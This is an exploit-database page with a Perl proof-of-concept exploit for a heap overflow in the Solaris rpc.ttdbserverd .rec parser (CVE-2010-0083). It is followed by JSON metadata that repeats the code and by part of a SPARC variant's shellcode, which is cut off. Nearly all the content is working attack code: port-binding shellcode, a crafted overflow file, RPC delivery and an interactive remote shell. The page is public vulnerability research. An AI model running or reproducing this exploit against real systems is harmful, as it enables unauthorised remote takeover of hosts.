Search...

rpc.ttdbserverd x86 Proof Of Concept Exploit

2010-08-17T00:00:00

ID PACKETSTORM:92793
Type packetstorm
Reporter Rodrigo Rubira Branco
Modified 2010-08-17T00:00:00

Description

                                        
                                            `##########################################################################  
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #  
# Rodrigo Rubira Branco - &lt;rbranco *noSPAM* checkpoint.com&gt; #  
# #  
# RPC TTDB .rec parser Heap Overflow #  
# #   
# thr_jmp_table does not exist on Solaris 10 u8 #  
# See the SPARC version of this exploit to see how to specify other #  
# addresses to be overwritten #  
##########################################################################  
  
use POSIX;  
use IO::Socket;  
use IO::Select;  
  
$shellrise = #portbind 1234  
"\x68\xff\xd8\xff\x3c".# /* pushl $0x3cffd8ff */  
"\x6a\x65".# /* pushl $0x65 */  
"\x89\xe6".# /* movl %esp,%esi */  
"\xf7\x56\x04".# /* notl 0x04(%esi) */  
"\xf6\x16".# /* notb (%esi) */  
"\x31\xc0".# /* xorl %eax,%eax */  
"\x50".# /* pushl %eax */  
"\x68\xff\x02\x04\xd2".# /* pushl $0xd20402ff */  
"\x89\xe7".# /* movl %esp,%edi */  
"\x6a\x02".# /* pushl $0x02 */  
"\x50".# /* pushl %eax */  
"\x50".# /* pushl %eax */  
"\x6a\x02".# /* pushl $0x02 */  
"\x6a\x02".# /* pushl $0x02 */  
"\xb0\xe6".# /* movb $0xe6,%al */  
"\xff\xd6".# /* call *%esi */  
"\x6a\x10".# /* pushl $0x10 */  
"\x57".# /* pushl %edi */  
"\x50".# /* pushl %eax */  
"\x31\xc0".# /* xorl %eax,%eax */  
"\xb0\xe8".# /* movb $0xe8,%al */  
"\xff\xd6".# /* call *%esi */  
"\x5b".# /* popl %ebx */  
"\x50".# /* pushl %eax */  
"\x50".# /* pushl %eax */  
"\x53".# /* pushl %ebx */  
"\xb0\xe9".# /* movb $0xe9,%al */  
"\xff\xd6".# /* call *%esi */  
"\xb0\xea".# /* movb $0xea,%al */  
"\xff\xd6".# /* call *%esi */  
"\x6a\x09".# /* pushl $0x09 */  
"\x50".# /* pushl %eax */  
"\x6a\x3e".# /* pushl $0x3e */  
"\x58".# /* popl %eax */  
"\xff\xd6".# /* call *%esi */  
"\xff\x4f\xd8".# /* decl -0x28(%edi) */  
"\x79\xf6".# /* jns &lt;bndsockcode+61&gt; */  
"\x50".# /* pushl %eax */  
"\x68\x2f\x2f\x73\x68".# /* pushl $0x68732f2f */  
"\x68\x2f\x62\x69\x6e".# /* pushl $0x6e69622f */  
"\x89\xe3".# /* movl %esp,%ebx */  
"\x50".# /* pushl %eax */  
"\x53".# /* pushl %ebx */  
"\x89\xe1".# /* movl %esp,%ecx */  
"\x50".# /* pushl %eax */  
"\x51".# /* pushl %ecx */  
"\x53".# /* pushl %ebx */  
"\xb0\x3b".# /* movb $0x3b,%al */  
"\xff\xd6";# /* call *%esi */  
  
  
$heap = 0x08047c14; # Where to write. Solaris 9 x86 update 8  
$frst = pack('n',(($heap & 0xffff0000) &gt;&gt; 16));  
$scnd = pack('n',($heap & 0x0000ffff));  
  
$stck = 0x08047644; # Shellcode Address  
$sfrst = pack('n',(($stck & 0xffff0000) &gt;&gt; 16));  
$sscnd = pack('n',($stck & 0x0000ffff));   
  
$file = "/tmp/owned";  
  
print STDERR "-= rpc.ttdbserverd .rec parser exploit for Solaris 9/10 x86 =-\n";  
print STDERR "-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n";  
print STDERR "-= Rodrigo Rubira Branco &lt;rbranco *noSPAM* checkpoint.com&gt; =-\n\n";  
  
$rpcdata =  
"\x80\x00\x00\x98\x19\x38\xba\x51\x00\x00\x00\x00\x00\x00".  
"\x00\x02\x00\x01\x86\xf3\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00".  
"\x00\x01\x00\x00\x00\x20\x4b\x3b\x63\x40\x00\x00\x00\x09\x6c\x6f".  
"\x63\x61\x6c\x68\x6f\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
pack('N',length($file)) .  
$file.  
"\x00\x00\x00\x00\x00".   
"\x00\x04\x31\x32\x33\x34\x00\x00\x00\x00\x00\x04\x35\x36\x37\x38".  
"\x00\x00\x00\x00\x00\x04\x39\x40\x41\x42\x00\x00\x00\x00\x00\x04".  
"\x43\x44\x45\x46\x00\x00\x00\x00\x00\x04\x47\x48\x49\x50\x00\x00".  
"\x00\x00\x00\x04\x51\x52\x53\x54\x00\x00\x00\x04\x55\x56\x57\x58";  
  
$pkt =  
"\x4E\x65\x74\x49\x53\x41\x4D\x00\x55\x6E\x6B\x6E\x6F\x77\x6E\x00".  
"\x31\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x04\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x03\x00\x1C\x00\x1C\x00\x00\x00\x00\x00\x03\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04".  
"\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x41\x41\x41\x41".  
"A" x 80 .  
"\xff\xff\x00\x00".  
"\x00\x00\x00\x00".  
"1234".  
$sscnd . $sfrst.  
"\xff\xff\xff\xff".  
"\xff\xff\xff\xff".  
"\x00\x00\x00\x02".  
"\x00\x00\x00\x00".  
"aaaa".  
$scnd . $frst.  
"bbbbbb".  
"\x90" x 504 . "\xeb\x50" . "\x90" x 102 . $shellrise .   
"\x90" x (3300 - length($shellrise) - 608);   
  
open(F,"&gt;/tmp/owned.rec") or die("Cant create file on /tmp");  
print STDERR "[+] Creating file " . $file . ".rec\n";  
print F $pkt;  
close(F);  
  
$target_host = "localhost";  
$port = rpc_getport($target_host, 111, 100083, 1);  
if(!$port){ die ("[-] TTDB not running on target!\n");}  
  
print STDERR "[+] TTDB running on port $port\n";  
  
  
$sock = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerHost=&gt;$target_host,PeerPort=&gt;$port)  
or die "[-] Cant Connect!!\n";  
  
print STDERR "[+] Sending stuff to TTDB ...";  
print $sock $rpcdata;  
print STDERR "d0ne!\n";  
  
close($sock);  
  
print STDERR "[+] Wait a little!\n";  
sleep(2);  
  
$sc = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerHost=&gt;$target_host,PeerPort=&gt;1234,Type=&gt;SOCK_STREAM,Reuse=&gt;1)  
or die "[*] No luck :(\n\n";  
  
print "[*] We got in =)\n";  
  
$sc-&gt;autoflush(1);  
  
sleep(2);  
  
print $sc "echo;uname -a;id;echo\n";  
  
die "cant fork: $!" unless defined($pid = fork());  
  
if ($pid) {  
while(defined ($line = &lt;$sc&gt;)) {  
print STDOUT $line;  
}  
kill("TERM", $pid);  
}  
else  
{  
while(defined ($line = &lt;STDIN&gt;)) {  
print $sc $line;  
}  
}  
close($sc);  
print "Good bye!!\n";  
  
  
  
sub rpc_getport {  
my ($target_host, $target_port, $prog, $vers) = @_;  
  
my $s = rpc_socket($target_host, $target_port);  
  
my $portmap_req =  
  
pack("L", rand() * 0xffffffff) . # XID  
"\x00\x00\x00\x00". # Call  
"\x00\x00\x00\x02". # RPC Version  
"\x00\x01\x86\xa0". # Program Number (PORTMAP)  
"\x00\x00\x00\x02". # Program Version (2)  
"\x00\x00\x00\x03". # Procedure (getport)  
("\x00" x 16). # Credentials and Verifier  
pack("N", $prog) .  
pack("N", $vers).  
pack("N", 0x6). # Protocol: TCP   
pack("N", 0x00); # Port: 0  
  
print $s $portmap_req;  
  
my $r = rpc_read($s);  
close ($s);  
  
if (length($r) == 28)  
{  
my $prog_port = unpack("N",substr($r, 24, 4));  
return($prog_port);  
}  
  
return undef;  
}  
  
sub rpc_socket {  
my ($target_host, $target_port) = @_;  
my $s = IO::Socket::INET-&gt;new  
(  
PeerAddr =&gt; $target_host,  
PeerPort =&gt; $target_port,  
Proto =&gt; "udp",  
Type =&gt; SOCK_DGRAM  
);  
  
if (! $s)  
{  
print "\nError: could not create socket to target: $!\n";  
exit(0);  
}  
  
select($s); $|++;  
select(STDOUT); $|++;  
nonblock($s);  
return($s);  
}  
  
sub rpc_read {  
my ($s) = @_;  
my $sel = IO::Select-&gt;new($s);  
my $res;  
my @fds = $sel-&gt;can_read(4);  
foreach (@fds) { $res .= &lt;$s&gt;; }  
return $res;  
}  
  
sub nonblock {  
my ($fd) = @_;  
my $flags = fcntl($fd, F_GETFL,0);  
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);  
}  
  
sub hexdump  
{  
my ($buf) = @_;  
my ($p, $c, $pc, $str);  
my ($i);  
  
for ($i=0;$i&lt;length($buf);$i++)  
{  
$p = substr($buf, $i, 1);  
$c = ord ($p);  
printf "%.2x ", $c;  
$pc++;  
if (($c &gt; 31) && ($c &lt; 127))  
{  
$str .= $p;  
}  
else  
{  
$str .= ".";  
}  
if ($pc == 16)  
{  
print " $str\n";  
undef $str;  
$pc = 0;  
}  
}  
print " " x (16 - $pc);  
print " $str \n";  
}  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:92793", "type": "packetstorm", "bulletinFamily": "exploit", "title": "rpc.ttdbserverd x86 Proof Of Concept Exploit", "description": "", "published": "2010-08-17T00:00:00", "modified": "2010-08-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.6}, "href": "https://packetstormsecurity.com/files/92793/rpc.ttdbserverd-x86-Proof-Of-Concept-Exploit.html", "reporter": "Rodrigo Rubira Branco", "references": [], "cvelist": ["CVE-2010-0083"], "lastseen": "2016-12-05T22:20:47", "viewCount": 3, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-12-05T22:20:47", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-0083"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10999", "SECURITYVULNS:DOC:24274", "SECURITYVULNS:DOC:24227", "SECURITYVULNS:VULN:11009"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:92792"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2010-155308"]}], "modified": "2016-12-05T22:20:47", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/92793/final_x86.pl.txt", "sourceData": "`########################################################################## \n# Check Point Software Technologies - Vulnerability Discovery Team (VDT) # \n# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> # \n# # \n# RPC TTDB .rec parser Heap Overflow # \n# # \n# thr_jmp_table does not exist on Solaris 10 u8 # \n# See the SPARC version of this exploit to see how to specify other # \n# addresses to be overwritten # \n########################################################################## \n \nuse POSIX; \nuse IO::Socket; \nuse IO::Select; \n \n$shellrise = #portbind 1234 \n\"\\x68\\xff\\xd8\\xff\\x3c\".# /* pushl $0x3cffd8ff */ \n\"\\x6a\\x65\".# /* pushl $0x65 */ \n\"\\x89\\xe6\".# /* movl %esp,%esi */ \n\"\\xf7\\x56\\x04\".# /* notl 0x04(%esi) */ \n\"\\xf6\\x16\".# /* notb (%esi) */ \n\"\\x31\\xc0\".# /* xorl %eax,%eax */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x68\\xff\\x02\\x04\\xd2\".# /* pushl $0xd20402ff */ \n\"\\x89\\xe7\".# /* movl %esp,%edi */ \n\"\\x6a\\x02\".# /* pushl $0x02 */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x6a\\x02\".# /* pushl $0x02 */ \n\"\\x6a\\x02\".# /* pushl $0x02 */ \n\"\\xb0\\xe6\".# /* movb $0xe6,%al */ \n\"\\xff\\xd6\".# /* call *%esi */ \n\"\\x6a\\x10\".# /* pushl $0x10 */ \n\"\\x57\".# /* pushl %edi */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x31\\xc0\".# /* xorl %eax,%eax */ \n\"\\xb0\\xe8\".# /* movb $0xe8,%al */ \n\"\\xff\\xd6\".# /* call *%esi */ \n\"\\x5b\".# /* popl %ebx */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x53\".# /* pushl %ebx */ \n\"\\xb0\\xe9\".# /* movb $0xe9,%al */ \n\"\\xff\\xd6\".# /* call *%esi */ \n\"\\xb0\\xea\".# /* movb $0xea,%al */ \n\"\\xff\\xd6\".# /* call *%esi */ \n\"\\x6a\\x09\".# /* pushl $0x09 */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x6a\\x3e\".# /* pushl $0x3e */ \n\"\\x58\".# /* popl %eax */ \n\"\\xff\\xd6\".# /* call *%esi */ \n\"\\xff\\x4f\\xd8\".# /* decl -0x28(%edi) */ \n\"\\x79\\xf6\".# /* jns <bndsockcode+61> */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x68\\x2f\\x2f\\x73\\x68\".# /* pushl $0x68732f2f */ \n\"\\x68\\x2f\\x62\\x69\\x6e\".# /* pushl $0x6e69622f */ \n\"\\x89\\xe3\".# /* movl %esp,%ebx */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x53\".# /* pushl %ebx */ \n\"\\x89\\xe1\".# /* movl %esp,%ecx */ \n\"\\x50\".# /* pushl %eax */ \n\"\\x51\".# /* pushl %ecx */ \n\"\\x53\".# /* pushl %ebx */ \n\"\\xb0\\x3b\".# /* movb $0x3b,%al */ \n\"\\xff\\xd6\";# /* call *%esi */ \n \n \n$heap = 0x08047c14; # Where to write. Solaris 9 x86 update 8 \n$frst = pack('n',(($heap & 0xffff0000) >> 16)); \n$scnd = pack('n',($heap & 0x0000ffff)); \n \n$stck = 0x08047644; # Shellcode Address \n$sfrst = pack('n',(($stck & 0xffff0000) >> 16)); \n$sscnd = pack('n',($stck & 0x0000ffff)); \n \n$file = \"/tmp/owned\"; \n \nprint STDERR \"-= rpc.ttdbserverd .rec parser exploit for Solaris 9/10 x86 =-\\n\"; \nprint STDERR \"-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\\n\"; \nprint STDERR \"-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\\n\\n\"; \n \n$rpcdata = \n\"\\x80\\x00\\x00\\x98\\x19\\x38\\xba\\x51\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x02\\x00\\x01\\x86\\xf3\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x00\". \n\"\\x00\\x01\\x00\\x00\\x00\\x20\\x4b\\x3b\\x63\\x40\\x00\\x00\\x00\\x09\\x6c\\x6f\". \n\"\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \npack('N',length($file)) . \n$file. \n\"\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x04\\x31\\x32\\x33\\x34\\x00\\x00\\x00\\x00\\x00\\x04\\x35\\x36\\x37\\x38\". \n\"\\x00\\x00\\x00\\x00\\x00\\x04\\x39\\x40\\x41\\x42\\x00\\x00\\x00\\x00\\x00\\x04\". \n\"\\x43\\x44\\x45\\x46\\x00\\x00\\x00\\x00\\x00\\x04\\x47\\x48\\x49\\x50\\x00\\x00\". \n\"\\x00\\x00\\x00\\x04\\x51\\x52\\x53\\x54\\x00\\x00\\x00\\x04\\x55\\x56\\x57\\x58\"; \n \n$pkt = \n\"\\x4E\\x65\\x74\\x49\\x53\\x41\\x4D\\x00\\x55\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x00\". \n\"\\x31\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x04\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x03\\x00\\x1C\\x00\\x1C\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\". \n\"\\xFF\\xFF\\xFF\\xFF\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x00\\x41\\x41\\x41\\x41\". \n\"A\" x 80 . \n\"\\xff\\xff\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\". \n\"1234\". \n$sscnd . $sfrst. \n\"\\xff\\xff\\xff\\xff\". \n\"\\xff\\xff\\xff\\xff\". \n\"\\x00\\x00\\x00\\x02\". \n\"\\x00\\x00\\x00\\x00\". \n\"aaaa\". \n$scnd . $frst. \n\"bbbbbb\". \n\"\\x90\" x 504 . \"\\xeb\\x50\" . \"\\x90\" x 102 . $shellrise . \n\"\\x90\" x (3300 - length($shellrise) - 608); \n \nopen(F,\">/tmp/owned.rec\") or die(\"Cant create file on /tmp\"); \nprint STDERR \"[+] Creating file \" . $file . \".rec\\n\"; \nprint F $pkt; \nclose(F); \n \n$target_host = \"localhost\"; \n$port = rpc_getport($target_host, 111, 100083, 1); \nif(!$port){ die (\"[-] TTDB not running on target!\\n\");} \n \nprint STDERR \"[+] TTDB running on port $port\\n\"; \n \n \n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$target_host,PeerPort=>$port) \nor die \"[-] Cant Connect!!\\n\"; \n \nprint STDERR \"[+] Sending stuff to TTDB ...\"; \nprint $sock $rpcdata; \nprint STDERR \"d0ne!\\n\"; \n \nclose($sock); \n \nprint STDERR \"[+] Wait a little!\\n\"; \nsleep(2); \n \n$sc = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$target_host,PeerPort=>1234,Type=>SOCK_STREAM,Reuse=>1) \nor die \"[*] No luck :(\\n\\n\"; \n \nprint \"[*] We got in =)\\n\"; \n \n$sc->autoflush(1); \n \nsleep(2); \n \nprint $sc \"echo;uname -a;id;echo\\n\"; \n \ndie \"cant fork: $!\" unless defined($pid = fork()); \n \nif ($pid) { \nwhile(defined ($line = <$sc>)) { \nprint STDOUT $line; \n} \nkill(\"TERM\", $pid); \n} \nelse \n{ \nwhile(defined ($line = <STDIN>)) { \nprint $sc $line; \n} \n} \nclose($sc); \nprint \"Good bye!!\\n\"; \n \n \n \nsub rpc_getport { \nmy ($target_host, $target_port, $prog, $vers) = @_; \n \nmy $s = rpc_socket($target_host, $target_port); \n \nmy $portmap_req = \n \npack(\"L\", rand() * 0xffffffff) . # XID \n\"\\x00\\x00\\x00\\x00\". # Call \n\"\\x00\\x00\\x00\\x02\". # RPC Version \n\"\\x00\\x01\\x86\\xa0\". # Program Number (PORTMAP) \n\"\\x00\\x00\\x00\\x02\". # Program Version (2) \n\"\\x00\\x00\\x00\\x03\". # Procedure (getport) \n(\"\\x00\" x 16). # Credentials and Verifier \npack(\"N\", $prog) . \npack(\"N\", $vers). \npack(\"N\", 0x6). # Protocol: TCP \npack(\"N\", 0x00); # Port: 0 \n \nprint $s $portmap_req; \n \nmy $r = rpc_read($s); \nclose ($s); \n \nif (length($r) == 28) \n{ \nmy $prog_port = unpack(\"N\",substr($r, 24, 4)); \nreturn($prog_port); \n} \n \nreturn undef; \n} \n \nsub rpc_socket { \nmy ($target_host, $target_port) = @_; \nmy $s = IO::Socket::INET->new \n( \nPeerAddr => $target_host, \nPeerPort => $target_port, \nProto => \"udp\", \nType => SOCK_DGRAM \n); \n \nif (! $s) \n{ \nprint \"\\nError: could not create socket to target: $!\\n\"; \nexit(0); \n} \n \nselect($s); $|++; \nselect(STDOUT); $|++; \nnonblock($s); \nreturn($s); \n} \n \nsub rpc_read { \nmy ($s) = @_; \nmy $sel = IO::Select->new($s); \nmy $res; \nmy @fds = $sel->can_read(4); \nforeach (@fds) { $res .= <$s>; } \nreturn $res; \n} \n \nsub nonblock { \nmy ($fd) = @_; \nmy $flags = fcntl($fd, F_GETFL,0); \nfcntl($fd, F_SETFL, $flags|O_NONBLOCK); \n} \n \nsub hexdump \n{ \nmy ($buf) = @_; \nmy ($p, $c, $pc, $str); \nmy ($i); \n \nfor ($i=0;$i<length($buf);$i++) \n{ \n$p = substr($buf, $i, 1); \n$c = ord ($p); \nprintf \"%.2x \", $c; \n$pc++; \nif (($c > 31) && ($c < 127)) \n{ \n$str .= $p; \n} \nelse \n{ \n$str .= \".\"; \n} \nif ($pc == 16) \n{ \nprint \" $str\\n\"; \nundef $str; \n$pc = 0; \n} \n} \nprint \" \" x (16 - $pc); \nprint \" $str \\n\"; \n} \n`\n"}

{"cve": [{"lastseen": "2020-10-03T11:57:21", "description": "Unspecified vulnerability in Oracle OpenSolaris 8, 9, and 10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.", "edition": 3, "cvss3": {}, "published": "2010-07-13T22:30:00", "title": "CVE-2010-0083", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0083"], "modified": "2012-10-23T03:17:00", "cpe": ["cpe:/o:oracle:opensolaris:9", "cpe:/o:oracle:opensolaris:8", "cpe:/o:oracle:opensolaris:10"], "id": "CVE-2010-0083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0083", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:oracle:opensolaris:8:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:opensolaris:9:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:opensolaris:10:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:37", "description": "", "published": "2010-08-17T00:00:00", "type": "packetstorm", "title": "rpc.ttdbserverd SPARC Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0083"], "modified": "2010-08-17T00:00:00", "id": "PACKETSTORM:92792", "href": "https://packetstormsecurity.com/files/92792/rpc.ttdbserverd-SPARC-Proof-Of-Concept-Exploit.html", "sourceData": "`########################################################################## \n# Check Point Software Technologies - Vulnerability Discovery Team (VDT) # \n# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> # \n# # \n# RPC TTDB .rec parser Heap Overflow # \n# # \n# thr_jmp_table does not exist on Solaris 10 u8 so use the -a # \n# option to specify the address of the saved window or other structures # \n# to overwrite # \n########################################################################## \n \nuse POSIX; \nuse IO::Socket; \nuse IO::Select; \nuse Getopt::Std; \n \n$shellrise = \n\"\\xa0\\x23\\xa0\\x10\".# /* sub %sp, 16, %l0 */ \n\"\\xae\\x23\\x80\\x10\".# /* sub %sp, %l0, %l7 */ \n\"\\xee\\x23\\xbf\\xec\".# /* st %l7, [%sp - 20] */ \n\"\\x82\\x05\\xe0\\xd6\".# /* add %l7, 214, %g1 */ \n\"\\x90\\x25\\xe0\\x0e\".# /* sub %l7, 14, %o0 */ \n\"\\x92\\x25\\xe0\\x0e\".# /* sub %l7, 14, %o1 */ \n\"\\x94\\x1c\\x40\\x11\".# /* xor %l1, %l1, %o2 */ \n\"\\x96\\x1c\\x40\\x11\".# /* xor %l1, %l1, %o3 */ \n\"\\x98\\x25\\xe0\\x0f\".# /* sub %l7, 15, %o4 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\xa4\\x1a\\x80\\x08\".# /* xor %o2, %o0, %l2 */ \n\"\\xd2\\x33\\xbf\\xf0\".# /* sth %o1, [%sp - 16] */ \n\"\\xac\\x10\\x27\\xd1\".# /* mov 2001, %l6 */ \n\"\\xec\\x33\\xbf\\xf2\".# /* sth %l6, [%sp - 14] */ \n\"\\xc0\\x23\\xbf\\xf4\".# /* st %g0, [%sp - 12] */ \n\"\\x82\\x05\\xe0\\xd8\".# /* add %l7, 216, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x1a\\xc0\\x10\".# /* xor %o3, %l0, %o1 */ \n\"\\x94\\x1a\\xc0\\x17\".# /* xor %o3, %l7, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x82\\x05\\xe0\\xd9\".# /* add %l7, 217, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x25\\xe0\\x0b\".# /* sub %l7, 11, %o1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x82\\x05\\xe0\\xda\".# /* add %l7, 218, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x1a\\xc0\\x10\".# /* xor %o3, %l0, %o1 */ \n\"\\x94\\x23\\xa0\\x14\".# /* sub %sp, 20, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\xa6\\x1a\\xc0\\x08\".# /* xor %o3, %o0, %l3 */ \n\"\\x82\\x05\\xe0\\x2e\".# /* add %l7, 46, %g1 */ \n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x02\\xe0\\x01\".# /* add %o3, 1, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x02\\xe0\\x02\".# /* add %o3, 2, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o0 */ \n\"\\x82\\x02\\xe0\\x17\".# /* add %o3, 23, %g1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x21\\x0b\\xd8\\x9a\".# /* sethi %hi(0x2f626800), %l0 */ \n\"\\xa0\\x14\\x21\\x6e\".# /* or %l0, 0x16e, %l0 ! 0x2f62696e */ \n\"\\x23\\x0b\\xdc\\xda\".# /* sethi %hi(0x2f736800), %l1 */ \n\"\\x90\\x23\\xa0\\x10\".# /* sub %sp, 16, %o0 */ \n\"\\x92\\x23\\xa0\\x08\".# /* sub %sp, 8, %o1 */ \n\"\\x94\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o2 */ \n\"\\xe0\\x3b\\xbf\\xf0\".# /* std %l0, [%sp - 16] */ 